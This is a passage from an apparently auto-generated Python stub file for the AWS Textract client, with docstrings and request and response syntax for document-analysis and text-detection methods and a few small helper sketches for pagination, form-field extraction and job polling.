The identifier for the recognized text. The identifier is only unique for a single operation.
- **Relationships** *(list) --*
A list of child blocks of the current block. For example a LINE object has child blocks for each WORD block that's part of the line of text. There aren't Relationship objects in the list for relationships that don't exist, such as when the current block has no child blocks. The list size can be the following:
* 0 - The block has no child blocks.
* 1 - The block has child blocks.
- *(dict) --*
Information about how blocks are related to each other. A ``Block`` object contains 0 or more ``Relation`` objects in a list, ``Relationships`` . For more information, see Block .
The ``Type`` element provides the type of the relationship for all blocks in the ``IDs`` array.
- **Type** *(string) --*
The type of relationship that the blocks in the IDs array have with the current block. The relationship can be ``VALUE`` or ``CHILD`` .
- **Ids** *(list) --*
An array of IDs for related blocks. You can get the type of the relationship from the ``Type`` element.
- *(string) --*
- **EntityTypes** *(list) --*
The type of entity. The following can be returned:
* *KEY* - An identifier for a field on the document.
* *VALUE* - The field text.
``EntityTypes`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- *(string) --*
- **SelectionStatus** *(string) --*
The selection status of a selectable element such as a radio button or checkbox.
- **Page** *(integer) --*
The page in which a block was detected. ``Page`` is returned by asynchronous operations. Page values greater than 1 are only returned for multi-page documents that are in PDF format. A scanned image (JPG/PNG), even if it contains multiple document pages, is always considered to be a single-page document and the value of ``Page`` is always 1. Synchronous operations don't return ``Page`` as every input document is considered to be a single-page document.
:type Document: dict
:param Document: **[REQUIRED]**
The input document as base64-encoded bytes or an Amazon S3 object. If you use the AWS CLI to call Amazon Textract operations, you can\'t pass image bytes. The document must be an image in JPG or PNG format.
If you are using an AWS SDK to call Amazon Textract, you might not need to base64-encode image bytes passed using the ``Bytes`` field.
- **Bytes** *(bytes) --*
A blob of base-64 encoded documents bytes. The maximum size of a document that\'s provided in a blob of bytes is 5 MB. The document bytes must be in PNG or JPG format.
If you are using an AWS SDK to call Amazon Textract, you might not need to base64-encode image bytes passed using the ``Bytes`` field.
- **S3Object** *(dict) --*
Identifies an S3 object as the document source. The maximum size of a document stored in an S3 bucket is 5 MB.
- **Bucket** *(string) --*
The name of the S3 bucket.
- **Name** *(string) --*
The file name of the input document. It must be an image file (.JPG or .PNG format). Asynchronous operations also support PDF files.
- **Version** *(string) --*
If the bucket has versioning enabled, you can specify the object version.
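As an illustration of the ``Document`` shapes above, the following sketch builds the parameter from either a local image file or an S3 object. ``build_document`` is a hypothetical helper, not part of boto3:

```python
def build_document(image_path=None, bucket=None, name=None, version=None):
    """Build the ``Document`` parameter from a local image or an S3 object.

    Give exactly one source: a local image path, or an S3 bucket/name
    (with an optional object version).
    """
    if image_path is not None:
        # The SDK base64-encodes the bytes on the wire; pass raw bytes here.
        with open(image_path, 'rb') as f:
            return {'Bytes': f.read()}
    s3_object = {'Bucket': bucket, 'Name': name}
    if version is not None:
        s3_object['Version'] = version
    return {'S3Object': s3_object}
```

A call such as ``client.analyze_document(Document=build_document(bucket='my-bucket', name='form.png'), FeatureTypes=['FORMS'])`` would then pass the service\'s 5 MB and JPG/PNG constraints through unchanged.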
:rtype: dict
:returns:
"""
pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
``ClientMethod``.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method\'s model.
:returns: The presigned url
"""
pass
def get_document_analysis(self, JobId: str, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Gets the results for an Amazon Textract asynchronous operation that analyzes text in a document.
You start asynchronous text analysis by calling StartDocumentAnalysis , which returns a job identifier (``JobId`` ). When the text analysis operation finishes, Amazon Textract publishes a completion status to the Amazon Simple Notification Service (Amazon SNS) topic that's registered in the initial call to ``StartDocumentAnalysis`` . To get the results of the text-detection operation, first check that the status value published to the Amazon SNS topic is ``SUCCEEDED`` . If so, call ``GetDocumentAnalysis`` , and pass the job identifier (``JobId`` ) from the initial call to ``StartDocumentAnalysis`` .
``GetDocumentAnalysis`` returns an array of Block objects. The following types of information are returned:
* Words and lines that are related to nearby lines and words. The related information is returned in two Block objects each of type ``KEY_VALUE_SET`` : a KEY Block object and a VALUE Block object. For example, *Name: Ana Silva Carolina* contains a key and value. *Name:* is the key. *Ana Silva Carolina* is the value.
* Table and table cell data. A TABLE Block object contains information about a detected table. A CELL Block object is returned for each cell in a table.
* Selectable elements such as checkboxes and radio buttons. A SELECTION_ELEMENT Block object contains information about a selectable element.
* Lines and words of text. A LINE Block object contains one or more WORD Block objects.
Use the ``MaxResults`` parameter to limit the number of blocks returned. If there are more results than specified in ``MaxResults`` , the value of ``NextToken`` in the operation response contains a pagination token for getting the next set of results. To get the next page of results, call ``GetDocumentAnalysis`` , and populate the ``NextToken`` request parameter with the token value that's returned from the previous call to ``GetDocumentAnalysis`` .
For more information, see `Document Text Analysis <https://docs.aws.amazon.com/textract/latest/dg/how-it-works-analyzing.html>`__ .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/textract-2018-06-27/GetDocumentAnalysis>`_
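The ``MaxResults`` /``NextToken`` pagination loop described above can be sketched as a generator. This is an illustrative helper, not an SDK API; ``fetch_page`` is assumed to behave like ``client.get_document_analysis`` and is passed in so the loop is testable:

```python
def iter_analysis_blocks(fetch_page, job_id, max_results=1000):
    """Yield every Block of a finished analysis job, following NextToken.

    ``fetch_page`` is assumed to behave like
    ``client.get_document_analysis`` (a hypothetical seam for testing).
    """
    next_token = None
    while True:
        kwargs = {'JobId': job_id, 'MaxResults': max_results}
        if next_token:
            # Echo back the token from the previous page of results.
            kwargs['NextToken'] = next_token
        page = fetch_page(**kwargs)
        yield from page.get('Blocks', [])
        next_token = page.get('NextToken')
        if not next_token:
            break  # no token means this was the last page
```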
**Request Syntax**
::
response = client.get_document_analysis(
JobId='string',
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'DocumentMetadata': {
'Pages': 123
},
'JobStatus': 'IN_PROGRESS'|'SUCCEEDED'|'FAILED'|'PARTIAL_SUCCESS',
'NextToken': 'string',
'Blocks': [
{
'BlockType': 'KEY_VALUE_SET'|'PAGE'|'LINE'|'WORD'|'TABLE'|'CELL'|'SELECTION_ELEMENT',
'Confidence': ...,
'Text': 'string',
'RowIndex': 123,
'ColumnIndex': 123,
'RowSpan': 123,
'ColumnSpan': 123,
'Geometry': {
'BoundingBox': {
'Width': ...,
'Height': ...,
'Left': ...,
'Top': ...
},
'Polygon': [
{
'X': ...,
'Y': ...
},
]
},
'Id': 'string',
'Relationships': [
{
'Type': 'VALUE'|'CHILD',
'Ids': [
'string',
]
},
],
'EntityTypes': [
'KEY'|'VALUE',
],
'SelectionStatus': 'SELECTED'|'NOT_SELECTED',
'Page': 123
},
],
'Warnings': [
{
'ErrorCode': 'string',
'Pages': [
123,
]
},
],
'StatusMessage': 'string'
}
**Response Structure**
- *(dict) --*
- **DocumentMetadata** *(dict) --*
Information about a document that Amazon Textract processed. ``DocumentMetadata`` is returned in every page of paginated responses from an Amazon Textract operation.
- **Pages** *(integer) --*
The number of pages detected in the document.
- **JobStatus** *(string) --*
The current status of the text analysis job.
- **NextToken** *(string) --*
If the response is truncated, Amazon Textract returns this token. You can use this token in the subsequent request to retrieve the next set of text detection results.
- **Blocks** *(list) --*
The results of the text analysis operation.
- *(dict) --*
A ``Block`` represents items that are recognized in a document within a group of pixels close to each other. The information returned in a ``Block`` depends on the type of operation. In document-text detection (for example DetectDocumentText ), you get information about the detected words and lines of text. In text analysis (for example AnalyzeDocument ), you can also get information about the fields, tables and selection elements that are detected in the document.
An array of ``Block`` objects is returned by both synchronous and asynchronous operations. In synchronous operations, such as DetectDocumentText , the array of ``Block`` objects is the entire set of results. In asynchronous operations, such as GetDocumentAnalysis , the array is returned over one or more responses.
For more information, see `How Amazon Textract Works <https://docs.aws.amazon.com/textract/latest/dg/how-it-works.html>`__ .
- **BlockType** *(string) --*
The type of text that's recognized in a block. In text-detection operations, the following types are returned:
* *PAGE* - Contains a list of the LINE Block objects that are detected on a document page.
* *WORD* - A word detected on a document page. A word is one or more ISO basic Latin script characters that aren't separated by spaces.
* *LINE* - A string of tab-delimited, contiguous words that's detected on a document page.
In text analysis operations, the following types are returned:
* *PAGE* - Contains a list of child Block objects that are detected on a document page.
* *KEY_VALUE_SET* - Stores the KEY and VALUE Block objects for a field that's detected on a document page. Use the ``EntityType`` field to determine if a KEY_VALUE_SET object is a KEY Block object or a VALUE Block object.
* *WORD* - A word detected on a document page. A word is one or more ISO basic Latin script characters that aren't separated by spaces that's detected on a document page.
* *LINE* - A string of tab-delimited, contiguous words that's detected on a document page.
* *TABLE* - A table that's detected on a document page. A table is any grid-based information with 2 or more rows or columns with a cell span of 1 row and 1 column each.
* *CELL* - A cell within a detected table. The cell is the parent of the block that contains the text in the cell.
* *SELECTION_ELEMENT* - A selectable element such as a radio button or checkbox that's detected on a document page. Use the value of ``SelectionStatus`` to determine the status of the selection element.
- **Confidence** *(float) --*
The confidence that Amazon Textract has in the accuracy of the recognized text and the accuracy of the geometry points around the recognized text.
- **Text** *(string) --*
The word or line of text that's recognized by Amazon Textract.
- **RowIndex** *(integer) --*
The row in which a table cell is located. The first row position is 1. ``RowIndex`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **ColumnIndex** *(integer) --*
The column in which a table cell appears. The first column position is 1. ``ColumnIndex`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **RowSpan** *(integer) --*
The number of rows that a table cell spans. ``RowSpan`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **ColumnSpan** *(integer) --*
The number of columns that a table cell spans. ``ColumnSpan`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **Geometry** *(dict) --*
The location of the recognized text on the image. It includes an axis-aligned, coarse bounding box that surrounds the text, and a finer-grain polygon for more accurate spatial information.
- **BoundingBox** *(dict) --*
An axis-aligned coarse representation of the location of the recognized text on the document page.
- **Width** *(float) --*
The width of the bounding box as a ratio of the overall document page width.
- **Height** *(float) --*
The height of the bounding box as a ratio of the overall document page height.
- **Left** *(float) --*
The left coordinate of the bounding box as a ratio of overall document page width.
- **Top** *(float) --*
The top coordinate of the bounding box as a ratio of overall document page height.
- **Polygon** *(list) --*
Within the bounding box, a fine-grained polygon around the recognized text.
- *(dict) --*
The X and Y coordinates of a point on a document page. The X and Y values returned are ratios of the overall document page size. For example, if the input document is 700 x 200 and the operation returns X=0.5 and Y=0.25, then the point is at the (350,50) pixel coordinate on the document page.
An array of ``Point`` objects, ``Polygon`` , is returned by DetectDocumentText . ``Polygon`` represents a fine-grained polygon around detected text. For more information, see Geometry in the Amazon Textract Developer Guide.
- **X** *(float) --*
The value of the X coordinate for a point on a ``Polygon`` .
- **Y** *(float) --*
The value of the Y coordinate for a point on a ``Polygon`` .
- **Id** *(string) --*
The identifier for the recognized text. The identifier is only unique for a single operation.
- **Relationships** *(list) --*
A list of child blocks of the current block. For example, a LINE object has child blocks for each WORD block that's part of the line of text. There aren't Relationship objects in the list for relationships that don't exist, such as when the current block has no child blocks. The list size can be one of the following:
* 0 - The block has no child blocks.
* 1 - The block has child blocks.
- *(dict) --*
Information about how blocks are related to each other. A ``Block`` object contains 0 or more ``Relationship`` objects in a list, ``Relationships`` . For more information, see Block .
The ``Type`` element provides the type of the relationship for all blocks in the ``IDs`` array.
- **Type** *(string) --*
The type of relationship that the blocks in the IDs array have with the current block. The relationship can be ``VALUE`` or ``CHILD`` .
- **Ids** *(list) --*
An array of IDs for related blocks. You can get the type of the relationship from the ``Type`` element.
- *(string) --*
- **EntityTypes** *(list) --*
The type of entity. The following can be returned:
* *KEY* - An identifier for a field on the document.
* *VALUE* - The field text.
``EntityTypes`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- *(string) --*
- **SelectionStatus** *(string) --*
The selection status of a selectable element such as a radio button or checkbox.
- **Page** *(integer) --*
The page in which a block was detected. ``Page`` is returned by asynchronous operations. Page values greater than 1 are only returned for multi-page documents that are in PDF format. A scanned image (JPG/PNG), even if it contains multiple document pages, is always considered to be a single-page document and the value of ``Page`` is always 1. Synchronous operations don't return ``Page`` as every input document is considered to be a single-page document.
- **Warnings** *(list) --*
A list of warnings that occurred during the document analysis operation.
- *(dict) --*
A warning about an issue that occurred during asynchronous text analysis ( StartDocumentAnalysis ) or asynchronous document-text detection ( StartDocumentTextDetection ).
- **ErrorCode** *(string) --*
The error code for the warning.
- **Pages** *(list) --*
A list of the pages that the warning applies to.
- *(integer) --*
- **StatusMessage** *(string) --*
The current status of an asynchronous document analysis operation.
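The ``KEY_VALUE_SET`` , ``Relationships`` , and ``EntityTypes`` fields described above combine as follows when reading form fields out of a completed response. This is a hedged sketch over the documented block shapes, not an official helper; ``blocks`` is assumed to be the combined ``Blocks`` list with all pages already fetched:

```python
def extract_key_values(blocks):
    """Collect detected form fields as a {key text: value text} dict."""
    by_id = {block['Id']: block for block in blocks}

    def text_of(block):
        # Join the CHILD words (or selection statuses) under a block.
        words = []
        for rel in block.get('Relationships', []):
            if rel['Type'] != 'CHILD':
                continue
            for child_id in rel['Ids']:
                child = by_id[child_id]
                if child['BlockType'] == 'WORD':
                    words.append(child['Text'])
                elif child['BlockType'] == 'SELECTION_ELEMENT':
                    words.append(child['SelectionStatus'])
        return ' '.join(words)

    pairs = {}
    for block in blocks:
        if (block['BlockType'] == 'KEY_VALUE_SET'
                and 'KEY' in block.get('EntityTypes', [])):
            # A KEY block points at its VALUE block(s) via a VALUE relationship.
            value_ids = [vid
                         for rel in block.get('Relationships', [])
                         if rel['Type'] == 'VALUE'
                         for vid in rel['Ids']]
            pairs[text_of(block)] = ' '.join(text_of(by_id[vid]) for vid in value_ids)
    return pairs
```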
:type JobId: string
:param JobId: **[REQUIRED]**
A unique identifier for the text-analysis job. The ``JobId`` is returned from ``StartDocumentAnalysis`` .
:type MaxResults: integer
:param MaxResults:
The maximum number of results to return per paginated call. The largest value that you can specify is 1,000. If you specify a value greater than 1,000, a maximum of 1,000 results is returned. The default value is 1,000.
:type NextToken: string
:param NextToken:
If the previous response was incomplete (because there are more blocks to retrieve), Amazon Textract returns a pagination token in the response. You can use this pagination token to retrieve the next set of blocks.
:rtype: dict
:returns:
"""
pass
def get_document_text_detection(self, JobId: str, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Gets the results for an Amazon Textract asynchronous operation that detects text in a document. Amazon Textract can detect lines of text and the words that make up a line of text.
You start asynchronous text detection by calling StartDocumentTextDetection , which returns a job identifier (``JobId`` ). When the text detection operation finishes, Amazon Textract publishes a completion status to the Amazon Simple Notification Service (Amazon SNS) topic that's registered in the initial call to ``StartDocumentTextDetection`` . To get the results of the text-detection operation, first check that the status value published to the Amazon SNS topic is ``SUCCEEDED`` . If so, call ``GetDocumentTextDetection`` , and pass the job identifier (``JobId`` ) from the initial call to ``StartDocumentTextDetection`` .
``GetDocumentTextDetection`` returns an array of Block objects.
Each document page has an associated ``Block`` of type PAGE. Each PAGE ``Block`` object is the parent of LINE ``Block`` objects that represent the lines of detected text on a page. A LINE ``Block`` object is a parent for each word that makes up the line. Words are represented by ``Block`` objects of type WORD.
Use the MaxResults parameter to limit the number of blocks that are returned. If there are more results than specified in ``MaxResults`` , the value of ``NextToken`` in the operation response contains a pagination token for getting the next set of results. To get the next page of results, call ``GetDocumentTextDetection`` , and populate the ``NextToken`` request parameter with the token value that's returned from the previous call to ``GetDocumentTextDetection`` .
For more information, see `Document Text Detection <https://docs.aws.amazon.com/textract/latest/dg/how-it-works-detecting.html>`__ .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/textract-2018-06-27/GetDocumentTextDetection>`_
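Because ``Page`` is only meaningful for asynchronous, multi-page input, reassembling the detected text per page is a common first step after a job completes. A minimal sketch (``lines_by_page`` is a hypothetical helper over the ``Blocks`` list):

```python
def lines_by_page(blocks):
    """Group detected LINE text by page number.

    Synchronous operations omit ``Page``, so it defaults to 1 here.
    """
    pages = {}
    for block in blocks:
        if block['BlockType'] == 'LINE':
            pages.setdefault(block.get('Page', 1), []).append(block['Text'])
    return pages
```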
**Request Syntax**
::
response = client.get_document_text_detection(
JobId='string',
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'DocumentMetadata': {
'Pages': 123
},
'JobStatus': 'IN_PROGRESS'|'SUCCEEDED'|'FAILED'|'PARTIAL_SUCCESS',
'NextToken': 'string',
'Blocks': [
{
'BlockType': 'KEY_VALUE_SET'|'PAGE'|'LINE'|'WORD'|'TABLE'|'CELL'|'SELECTION_ELEMENT',
'Confidence': ...,
'Text': 'string',
'RowIndex': 123,
'ColumnIndex': 123,
'RowSpan': 123,
'ColumnSpan': 123,
'Geometry': {
'BoundingBox': {
'Width': ...,
'Height': ...,
'Left': ...,
'Top': ...
},
'Polygon': [
{
'X': ...,
'Y': ...
},
]
},
'Id': 'string',
'Relationships': [
{
'Type': 'VALUE'|'CHILD',
'Ids': [
'string',
]
},
],
'EntityTypes': [
'KEY'|'VALUE',
],
'SelectionStatus': 'SELECTED'|'NOT_SELECTED',
'Page': 123
},
],
'Warnings': [
{
'ErrorCode': 'string',
'Pages': [
123,
]
},
],
'StatusMessage': 'string'
}
**Response Structure**
- *(dict) --*
- **DocumentMetadata** *(dict) --*
Information about a document that Amazon Textract processed. ``DocumentMetadata`` is returned in every page of paginated responses from an Amazon Textract operation.
- **Pages** *(integer) --*
The number of pages detected in the document.
- **JobStatus** *(string) --*
The current status of the text detection job.
- **NextToken** *(string) --*
If the response is truncated, Amazon Textract returns this token. You can use this token in the subsequent request to retrieve the next set of text-detection results.
- **Blocks** *(list) --*
The results of the text-detection operation.
- *(dict) --*
A ``Block`` represents items that are recognized in a document within a group of pixels close to each other. The information returned in a ``Block`` depends on the type of operation. In document-text detection (for example DetectDocumentText ), you get information about the detected words and lines of text. In text analysis (for example AnalyzeDocument ), you can also get information about the fields, tables and selection elements that are detected in the document.
An array of ``Block`` objects is returned by both synchronous and asynchronous operations. In synchronous operations, such as DetectDocumentText , the array of ``Block`` objects is the entire set of results. In asynchronous operations, such as GetDocumentAnalysis , the array is returned over one or more responses.
For more information, see `How Amazon Textract Works <https://docs.aws.amazon.com/textract/latest/dg/how-it-works.html>`__ .
- **BlockType** *(string) --*
The type of text that's recognized in a block. In text-detection operations, the following types are returned:
* *PAGE* - Contains a list of the LINE Block objects that are detected on a document page.
* *WORD* - A word detected on a document page. A word is one or more ISO basic Latin script characters that aren't separated by spaces.
* *LINE* - A string of tab-delimited, contiguous words that's detected on a document page.
In text analysis operations, the following types are returned:
* *PAGE* - Contains a list of child Block objects that are detected on a document page.
* *KEY_VALUE_SET* - Stores the KEY and VALUE Block objects for a field that's detected on a document page. Use the ``EntityType`` field to determine if a KEY_VALUE_SET object is a KEY Block object or a VALUE Block object.
* *WORD* - A word detected on a document page. A word is one or more ISO basic Latin script characters that aren't separated by spaces that's detected on a document page.
* *LINE* - A string of tab-delimited, contiguous words that's detected on a document page.
* *TABLE* - A table that's detected on a document page. A table is any grid-based information with 2 or more rows or columns with a cell span of 1 row and 1 column each.
* *CELL* - A cell within a detected table. The cell is the parent of the block that contains the text in the cell.
* *SELECTION_ELEMENT* - A selectable element such as a radio button or checkbox that's detected on a document page. Use the value of ``SelectionStatus`` to determine the status of the selection element.
- **Confidence** *(float) --*
The confidence that Amazon Textract has in the accuracy of the recognized text and the accuracy of the geometry points around the recognized text.
- **Text** *(string) --*
The word or line of text that's recognized by Amazon Textract.
- **RowIndex** *(integer) --*
The row in which a table cell is located. The first row position is 1. ``RowIndex`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **ColumnIndex** *(integer) --*
The column in which a table cell appears. The first column position is 1. ``ColumnIndex`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **RowSpan** *(integer) --*
The number of rows that a table cell spans. ``RowSpan`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **ColumnSpan** *(integer) --*
The number of columns that a table cell spans. ``ColumnSpan`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **Geometry** *(dict) --*
The location of the recognized text on the image. It includes an axis-aligned, coarse bounding box that surrounds the text, and a finer-grain polygon for more accurate spatial information.
- **BoundingBox** *(dict) --*
An axis-aligned coarse representation of the location of the recognized text on the document page.
- **Width** *(float) --*
The width of the bounding box as a ratio of the overall document page width.
- **Height** *(float) --*
The height of the bounding box as a ratio of the overall document page height.
- **Left** *(float) --*
The left coordinate of the bounding box as a ratio of overall document page width.
- **Top** *(float) --*
The top coordinate of the bounding box as a ratio of overall document page height.
- **Polygon** *(list) --*
Within the bounding box, a fine-grained polygon around the recognized text.
- *(dict) --*
The X and Y coordinates of a point on a document page. The X and Y values returned are ratios of the overall document page size. For example, if the input document is 700 x 200 and the operation returns X=0.5 and Y=0.25, then the point is at the (350,50) pixel coordinate on the document page.
An array of ``Point`` objects, ``Polygon`` , is returned by DetectDocumentText . ``Polygon`` represents a fine-grained polygon around detected text. For more information, see Geometry in the Amazon Textract Developer Guide.
- **X** *(float) --*
The value of the X coordinate for a point on a ``Polygon`` .
- **Y** *(float) --*
The value of the Y coordinate for a point on a ``Polygon`` .
- **Id** *(string) --*
The identifier for the recognized text. The identifier is only unique for a single operation.
- **Relationships** *(list) --*
A list of child blocks of the current block. For example, a LINE object has child blocks for each WORD block that's part of the line of text. There aren't Relationship objects in the list for relationships that don't exist, such as when the current block has no child blocks. The list size can be one of the following:
* 0 - The block has no child blocks.
* 1 - The block has child blocks.
- *(dict) --*
Information about how blocks are related to each other. A ``Block`` object contains 0 or more ``Relationship`` objects in a list, ``Relationships`` . For more information, see Block .
The ``Type`` element provides the type of the relationship for all blocks in the ``IDs`` array.
- **Type** *(string) --*
The type of relationship that the blocks in the IDs array have with the current block. The relationship can be ``VALUE`` or ``CHILD`` .
- **Ids** *(list) --*
An array of IDs for related blocks. You can get the type of the relationship from the ``Type`` element.
- *(string) --*
- **EntityTypes** *(list) --*
The type of entity. The following can be returned:
* *KEY* - An identifier for a field on the document.
* *VALUE* - The field text.
``EntityTypes`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- *(string) --*
- **SelectionStatus** *(string) --*
The selection status of a selectable element such as a radio button or checkbox.
- **Page** *(integer) --*
The page in which a block was detected. ``Page`` is returned by asynchronous operations. Page values greater than 1 are only returned for multi-page documents that are in PDF format. A scanned image (JPG/PNG), even if it contains multiple document pages, is always considered to be a single-page document and the value of ``Page`` is always 1. Synchronous operations don't return ``Page`` as every input document is considered to be a single-page document.
- **Warnings** *(list) --*
A list of warnings that occurred during the document text-detection operation.
- *(dict) --*
A warning about an issue that occurred during asynchronous text analysis ( StartDocumentAnalysis ) or asynchronous document-text detection ( StartDocumentTextDetection ).
- **ErrorCode** *(string) --*
The error code for the warning.
- **Pages** *(list) --*
A list of the pages that the warning applies to.
- *(integer) --*
- **StatusMessage** *(string) --*
The current status of an asynchronous document text-detection operation.
:type JobId: string
:param JobId: **[REQUIRED]**
A unique identifier for the text detection job. The ``JobId`` is returned from ``StartDocumentTextDetection`` .
:type MaxResults: integer
:param MaxResults:
The maximum number of results to return per paginated call. The largest value you can specify is 1,000. If you specify a value greater than 1,000, a maximum of 1,000 results is returned. The default value is 1,000.
:type NextToken: string
:param NextToken:
If the previous response was incomplete (because there are more blocks to retrieve), Amazon Textract returns a pagination token in the response. You can use this pagination token to retrieve the next set of blocks.
:rtype: dict
:returns:
"""
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:raise OperationNotPageableError: Raised if the operation is not
pageable. You can use the ``client.can_paginate`` method to
check if an operation is pageable.
:rtype: L{botocore.paginate.Paginator}
:return: A paginator object.
"""
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters
section of the service docs for a list of available waiters.
:returns: The specified waiter object.
:rtype: botocore.waiter.Waiter
"""
pass
def start_document_analysis(self, DocumentLocation: Dict, FeatureTypes: List, ClientRequestToken: str = None, JobTag: str = None, NotificationChannel: Dict = None) -> Dict:
"""
Starts asynchronous analysis of an input document for relationships between detected items such as key and value pairs, tables, and selection elements.
``StartDocumentAnalysis`` can analyze text in documents that are in JPG, PNG, and PDF format. The documents are stored in an Amazon S3 bucket. Use DocumentLocation to specify the bucket name and file name of the document.
``StartDocumentAnalysis`` returns a job identifier (``JobId`` ) that you use to get the results of the operation. When text analysis is finished, Amazon Textract publishes a completion status to the Amazon Simple Notification Service (Amazon SNS) topic that you specify in ``NotificationChannel`` . To get the results of the text analysis operation, first check that the status value published to the Amazon SNS topic is ``SUCCEEDED`` . If so, call GetDocumentAnalysis , and pass the job identifier (``JobId`` ) from the initial call to ``StartDocumentAnalysis`` .
For more information, see `Document Text Analysis <https://docs.aws.amazon.com/textract/latest/dg/how-it-works-analyzing.html>`__ .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/textract-2018-06-27/StartDocumentAnalysis>`_
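The start-then-poll flow described above can be sketched as follows. ``analyze_document_async`` is a hypothetical wrapper, and polling ``GetDocumentAnalysis`` is a simple stand-in for subscribing to the (optional) SNS topic:

```python
import time

def analyze_document_async(client, bucket, name,
                           feature_types=('TABLES', 'FORMS'),
                           poll_seconds=5):
    """Start an analysis job and poll until it is no longer IN_PROGRESS.

    ``client`` is assumed to expose ``start_document_analysis`` and
    ``get_document_analysis`` (for example, ``boto3.client('textract')``).
    """
    job_id = client.start_document_analysis(
        DocumentLocation={'S3Object': {'Bucket': bucket, 'Name': name}},
        FeatureTypes=list(feature_types),
    )['JobId']
    while True:
        result = client.get_document_analysis(JobId=job_id)
        if result['JobStatus'] != 'IN_PROGRESS':
            return result  # SUCCEEDED, FAILED, or PARTIAL_SUCCESS
        time.sleep(poll_seconds)
```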
**Request Syntax**
::
response = client.start_document_analysis(
DocumentLocation={
'S3Object': {
'Bucket': 'string',
'Name': 'string',
'Version': 'string'
}
},
FeatureTypes=[
'TABLES'|'FORMS',
],
ClientRequestToken='string',
JobTag='string',
NotificationChannel={
'SNSTopicArn': 'string',
'RoleArn': 'string'
}
)
**Response Syntax**
::
{
'JobId': 'string'
}
**Response Structure**
- *(dict) --*
- **JobId** *(string) --*
The identifier for the document analysis job. Use ``JobId`` to identify the job in a subsequent call to ``GetDocumentAnalysis`` .
:type DocumentLocation: dict
:param DocumentLocation: **[REQUIRED]**
The location of the document to be processed.
- **S3Object** *(dict) --*
The Amazon S3 bucket that contains the input document.
- **Bucket** *(string) --*
The name of the S3 bucket.
- **Name** *(string) --*
The file name of the input document. It must be an image file (.JPG or .PNG format). Asynchronous operations also support PDF files.
- **Version** *(string) --*
If the bucket has versioning enabled, you can specify the object version.
:type FeatureTypes: list
:param FeatureTypes: **[REQUIRED]**
A list of the types of analysis to perform. Add TABLES to the list to return information about the tables that are detected in the input document. Add FORMS to return detected fields and the associated text. To perform both types of analysis, add TABLES and FORMS to ``FeatureTypes`` . All selectable elements (``SELECTION_ELEMENT`` ) that are detected are returned, whatever the value of ``FeatureTypes`` .
- *(string) --*
:type ClientRequestToken: string
:param ClientRequestToken:
The idempotent token that you use to identify the start request. If you use the same token with multiple ``StartDocumentAnalysis`` requests, the same ``JobId`` is returned. Use ``ClientRequestToken`` to prevent the same job from being accidentally started more than once.
:type JobTag: string
:param JobTag:
An identifier you specify that\'s included in the completion notification that\'s published to the Amazon SNS topic. For example, you can use ``JobTag`` to identify the type of document, such as a tax form or a receipt, that the completion notification corresponds to.
:type NotificationChannel: dict
:param NotificationChannel:
The Amazon SNS topic ARN that you want Amazon Textract to publish the completion status of the operation to.
- **SNSTopicArn** *(string) --* **[REQUIRED]**
The Amazon SNS topic that Amazon Textract posts the completion status to.
- **RoleArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) of an IAM role that gives Amazon Textract publishing permissions to the Amazon SNS topic.
:rtype: dict
:returns:
"""
pass
def start_document_text_detection(self, DocumentLocation: Dict, ClientRequestToken: str = None, JobTag: str = None, NotificationChannel: Dict = None) -> Dict:
"""
Starts the asynchronous detection of text in a document. Amazon Textract can detect lines of text and the words that make up a line of text.
``StartDocumentTextDetection`` can analyze text in documents that are in JPG, PNG, and PDF format. The documents are stored in an Amazon S3 bucket. Use DocumentLocation to specify the bucket name and file name of the document.
``StartDocumentTextDetection`` returns a job identifier (``JobId`` ) that you use to get the results of the operation. When text detection is finished, Amazon Textract publishes a completion status to the Amazon Simple Notification Service (Amazon SNS) topic that you specify in ``NotificationChannel`` . To get the results of the text detection operation, first check that the status value published to the Amazon SNS topic is ``SUCCEEDED`` . If so, call GetDocumentTextDetection , and pass the job identifier (``JobId`` ) from the initial call to ``StartDocumentTextDetection`` .
For more information, see `Document Text Detection <https://docs.aws.amazon.com/textract/latest/dg/how-it-works-detecting.html>`__ .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/textract-2018-06-27/StartDocumentTextDetection>`_
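``ClientRequestToken`` makes retries safe: resubmitting with the same token returns the original ``JobId`` instead of starting a duplicate job. A hedged sketch (``start_text_detection`` is a hypothetical wrapper, not part of the SDK):

```python
import uuid

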